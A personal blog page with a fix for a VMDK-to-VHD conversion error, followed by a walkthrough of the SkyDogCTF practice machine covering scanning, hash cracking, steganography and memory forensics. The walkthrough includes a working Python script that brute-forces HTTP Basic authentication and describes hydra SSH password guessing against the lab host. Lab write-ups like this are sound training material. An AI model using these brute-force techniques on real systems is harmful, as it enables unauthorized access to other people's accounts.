Saturday, December 24, 2016

ConvertTo-MvmcVirtualHardDisk: The entry is not a supported disk database entry for the descriptor.

I’ve ran into this issue twice now when trying to convert an ova into a vhd using ConvertTo-MvmcVirtualHardDisk.

Here’s what happens…

I download the ova, rename the file to .zip and extract the contents.  The virtual machines have typically been created/tested with Virtual Box so the archive usually includes an ovf and vmdk.

I open PowerShell and attempt to use ConvertTo-MvmcVirtualHardDisk but run into this error:

image

Here’s how to fix it.

1. Download dsfok-tools by Dariusz Stanislawek and extract the contents of the archive.

2. Run cmd.exe as administrator

3. Extract descriptor1.txt from the vmdk using dsfo.exe

image

4. Make a backup copy of descriptor1.txt.  If anything goes wrong just inject the backup.

5. Open descriptor1.txt (using NotePad++)

image

6. Comment all the lines after #DDB, delete the NUL and any “white space” at the end of the file.  Save the file.

image

7. Inject descriptor1.txt into the vmdk using dsfi.exe

image

8. Convert the vmdk to vhd

image

9. Create the virtual machine, attach the disk and boot the machine.

image

SkyDogCTF Walkthrough

 

This is the first time I’ve attempted a CTF.  Here’s a walkthrough for each flag.

Nmap scan…

image

SSH on port 22222 – Found flag #1 flag{53c82eba31f6d416f331de9162ebe997}

image

Cracked the hash – “encrypt”

 findmyhash md5 -h 53c82eba31f6d416f331de9162ebe997  

image

I pulled the index.html file with wget and found a comment about IE4 and /oldIE/html5.js

image

Reviewed the js file; the first line is hex…

image

Decoded the hex and found flag #2 flag{7c0132070a0ef71d542663e9dc1f5dee}

image

Cracked the hash – “nmap”

image

DIRB scan… and found /personnel

image

Tried to access /personnel but it seems to be “protected”

image

I assume “IE4” was a clue so I tried accessing /personnel with an IE4 user agent – found flag#3 flag{14e10d570047667f904261e6d08f520f} and another clue – so far so good.

image

I decided to take a look with FireFox… Agent Hanratty

image

Cracked the hash – “evidence” …  Clue = new + flag = newevidence

image

I tried to access /newevidence with IE4 user agent – 401 Unauthorized

image

Same using Burp Suite (using proxy to manipulate user agent) and FireFox

image

Tried to logon, hanratty:hanratty, didn’t work;

image

What is Agent Hanratty’s first name? Google says it’s Carl

image

I setup Burp Suite Intruder in an attempt to gain access but the free version is pretty slow…

image

… so I wrote a crude script in Python.  This let me try several username combinations with a couple dirb word lists for the password.  I got lucky with username “carl.hanratty” and password “Grace”.

image

 import subprocess;  
 import os;  
 import base64;  
 import time;  
 username = 'carl.hanratty'  
 seperator = ':'  
 count = 0  
 filename = '/usr/share/wordlists/dirb/others/names.txt'  
 target = 'http://192.168.12.12/newevidence'  
 #headers  
 useragent = '--user-agent=Mozilla/4.0 (compatible; MSIE 4.0; Windows NT 5.0)'  
 accept = '--header=Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'  
 acceptlang = '--header=Accept-Language: en-US,en;q=0.5'  
 acceptenc = '--header=Accept-Encoding: gzip, deflate'  
 connection = '--header=Connection: close'  
 with open(filename) as fp:  
   for line in fp:  
     password = line.replace("\n","")  
     creds = username + ":" + password  
     b64 = "%s" % (base64.b64encode(creds.encode('ascii')))  
     print "Trying %s %s" % (creds,b64)  
     auth = "--header=Authorization: Basic %s" % (b64)  
     try:  
       subprocess.check_output(['wget',target,useragent,accept,acceptlang,acceptenc,connection,auth])  
     except:  
       pass  
     if os.path.isfile("/root/Desktop/scripts/newevidence"):  
       break  
     count += 1  
     #time.sleep(1)  

I took a look with FireFox…

image

Checked out the hyperlink “Evidence Summary File” - found flag #4 flag{117c240d49f54096413dd64280399ea9}

image

Cracked the hash – “panam”

image

The hyperlink “Possible Location” links to an image.jpg, saved it, ran it through binwalk and then steghide with password “panam”.  found flag #5 flag{d1e5146b171928731385eb7ea38c37b8} and another clue.  So far, the cracked hashes are clues for the next flag but…

image

I got stuck here for a bit and tried a bunch of things.  I ended up taking things back to the beginning with nmap.

I wasn’t sure why the server was running HTTPS; everything I found so far was accessible over HTTP.  I took a look using openssl s_client and found flag #6 flag{f82366a9ddc064585d54e3f78bde3221}. 

image

Since it’s labeled “flag3” - I was supposed to find it earlier in the game – better late than never.

Cracked the hash – “personnel” – HA! yes, this was a clue for earlier.  Thank goodness dirb found the directory.

image

Stuck again… decided to give SSH a whirl… meh.  Brute force here we come…

I tried some standard name lists with various combos of username formats with the cracked hashes and clues as passwords.  It was taking too long; the username list had too many names.  I need to be more specific…

I wrote a Powershell script which queried Google looking for names related to the search strings I provided… (cheating? maybe… I didn’t review the results to see if anything was related to SkyDogCTF).

 $searchstrings = @(  
  "%22agent+hanratty%22",  
  "%22catch+me+if+you+can%22",  
  "%22Dont+go+Home+Frank%22",  
  "%22Theres+a+Hex+on+Your+House%22",  
  "%22Obscurity+or+Security%22",  
  "%22Be+Careful+Agent+Frank+Has+Been+Known+to+Intercept+Traffic+Our+Traffic%22",  
  "%22A+Good+Agent+is+Hard+to+Find%22",  
  "%22The+Devil+is+in+the+Details+Or+is+it+Dialogue%22",  
  "%22if+its+Simple+Guessable+or+Personal+it+Goes+Against+Best+Practices%22",  
  "%22Where+in+the+World+is+Frank%22",  
  "%22Frank+Was+Caught+on+Camera+Cashing+Checks+and+Yelling%22",  
  "%22The+Fastest+Man+Alive%22",  
  "%22Franks+Lost+His+Mind+or+Maybe+its+His+Memory%22",  
  "%22He+Locked+Himself+Inside+the+Building%22",  
  "%22Find+the+Code+to+Unlock+the+Door+Before+He+Gets+Himself+Killed%22",  
  "%22encrypt%22",  
  "%22nmap%22",  
  "%22personnel%22",  
  "%22newevidence%22",  
  "%22panam%22",  
  "%22iheartbrenda%22",  
  "%22ILoveFrance%22"  
 )  
 $names = gc C:\temp\names.txt  
 $googlenames = $null  
 $firstnamelastnames = @()  
 $googlednames = @()  
 $i = 1  
 $totalsearches = $searchstrings.count  
 foreach($searchstring in $searchstrings)  
 {  
  write-host "Searching Google [$i of $totalsearches]... " -foregroundcolor Green  
  $googlesays = (Invoke-WebRequest "https://www.google.com/search?q=$searchstring" -useragent ([Microsoft.PowerShell.Commands.PSUserAgent]::InternetExplorer))  
  $googlenames += $names | ?{$googlesays.rawcontent.contains($_)}  
  $f = 1  
  $totalnames = $googlenames.count  
  $l = $1  
  write-host " Parsing Results..." -ForegroundColor Cyan  
  #look for "firstname lastname"  
  foreach($firstname in $googlenames)  
  {  
   if($googlesays.rawcontent.contains("$firstname") -eq $true)  
   {  
    $googlednames += "$firstname"  
   }  
   foreach($lastname in $googlenames)  
   {  
    if($googlesays.rawcontent.contains("$firstname $lastname") -eq $true)  
    {  
     $firstnamelastnames += "$firstname $lastname"  
    }  
   }  
  }  
  write-host "...Sleeping" -foregroundcolor Red  
  start-sleep -seconds 2  
  $i++  
 }  
 $firstlast = ($firstnamelastnames | Group-Object).Name.replace(" ","")  
 #$first_space_last = ($firstnamelastnames | Group-Object).Name  
 $first_dot_last = ($firstnamelastnames | Group-Object).Name.replace(" ",".")  
 $first_underscore_last = ($firstnamelastnames | Group-Object).Name.replace(" ","_")  
 $firstlast += $firstlast.tolower() + $firstlast.toupper()  
 #$first_space_last += $first_space_last.tolower() + $first_space_last.toupper()  
 $first_dot_last += $first_dot_last.tolower() + $first_dot_last.toupper()  
 $first_underscore_last += $first_underscore_last.tolower() + $first_underscore_last.toupper()  
 $firstlast  
 #$first_space_last  
 #$first_dot_last  
 #$first_underscore_last  
 #$googlednames | Group-Object  

… this gave me a smaller list of usernames.  It was taking about 2 minutes to run ~200 usernames with one password at the default of 16 tasks in hydra.  I wasn’t sure of the username format so I used a couple variations and ended up with ~600 usernames and 8 passwords.  Again, I used the previous cracked hashes and clues for the password list.  I kicked hydra off and headed to bed.

The next day… ugh.  No hits but looking back through the logs I see a bunch of failures, reattempts, etc.  To make a long story short, I rebooted the server and tried the  user list with each password using the –p switch.  I also throttled tasks down to 1.  I was finally able to run through the lists with a smaller number of failures/reattempts.  I’ll have to revisit this again in the future… anyhow, I got a hit.

image

SSH to the server with the credentials for barryallen; Found flag #7 flag{bd2f6a1d5242c962a05619c56fa47ba6}

image

Cracked the hash – “theflash”

image

The last flag has to be in the security-system.data file; so I downloaded it

image

Ran it through binwalk; appears to be a zip archive

image

Unzip and binwalk… looks like a dmp?

image

Ran it through volatility

image

Dumped the clipboard contents… “666c61677b38343164643364623239623066626264383963376235626537363863646338317d”

image

found flag #8 flag{841dd3db29b0fbbd89c7b5be768cdc81}

image

Attempted to crack the hash… not a known hash.

image